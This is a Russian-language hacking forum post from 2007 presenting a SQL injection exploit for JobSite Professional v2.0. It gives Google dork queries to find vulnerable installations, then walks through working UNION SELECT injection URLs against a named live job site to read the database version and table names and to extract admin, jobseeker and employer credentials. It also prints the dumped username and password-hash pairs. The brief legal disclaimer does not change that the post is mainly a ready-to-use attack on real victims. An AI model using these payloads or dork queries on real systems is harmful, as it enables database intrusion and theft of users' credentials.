SQL-inj в JobSite Professional v2.0

Discussion in 'Веб-уязвимости' started by -=lebed=-, 8 Nov 2007.

  1. -=lebed=-

    -=lebed=- хэшкрякер

    Joined:
    21 Jun 2006
    Messages:
    3,804
    Likes Received:
    1,960
    Reputations:
    594
    Программа: JobSite Professional v2.0
    Code:
    http://[site]/File.php?id=[sql]
    
    Поиск в Гугл:
    inurl:index.php?page=en_jobseekers - английская версия
    inurl:index.php?page=fr_Candidats - французская версия
    Пример:
    _www.milkround.ie
    Cмотрим версию мускула, пользователя, базу:
    Code:
    _http://www.milkround.ie/file.php?id=-1+union+select+1,2,concat(version(),0x3a,user(),0x3a,database()),4,5,6,7,8/*
    
    5.0.24a-standard:jobs_portal@localhost:jobs_portal
    Смотрим названия таблиц, меняя лимит:
    Code:
    _http://www.milkround.ie/file.php?id=-1+union+select+1,2,table_name,4,5,6,7,8+from+information_schema.tables+limit+1,1/*
    
    всего 106 таблиц.
    Интересные таблицы:
    Code:
    _http://www.milkround.ie/file.php?id=-1+UNION+SELECT+1,2,CONCAT(USERNAME,0x3a,PASSWORD),4,5,6,7,8+FROM+websiteadmin_admin_users/*
    _http://www.milkround.ie/file.php?id=-1+UNION+SELECT+1,2,CONCAT(USERNAME,0x3a,PASSWORD),4,5,6,7,8+FROM+websiteadmin_ext_jobseekers/*
    _http://www.milkround.ie/file.php?id=-1+UNION+SELECT+1,2,CONCAT(USERNAME,0x3a,PASSWORD),4,5,6,7,8+FROM+websiteadmin_ext_employers/*
    
    administrator:61ff6c39c7925044f061566f4c21b267
    [email protected]:18859128760e989630b7d2073db3f1ba
    [email protected]:cb0be83e6cb9e65c62da133391b77a49

    PS. Пример использования уязвимости, представлен только для ознакомления, все незаконные действия совершаемые Вами могут быть уголовно наказуемы и вся ответственность за неправоменрные действия лежит на вас.
    AUTHOR : (нашёл уязвимость) ZynbER, пример мой ;-)
    www.milw0rm.com
     
    #1 -=lebed=-, 8 Nov 2007
    Last edited: 8 Nov 2007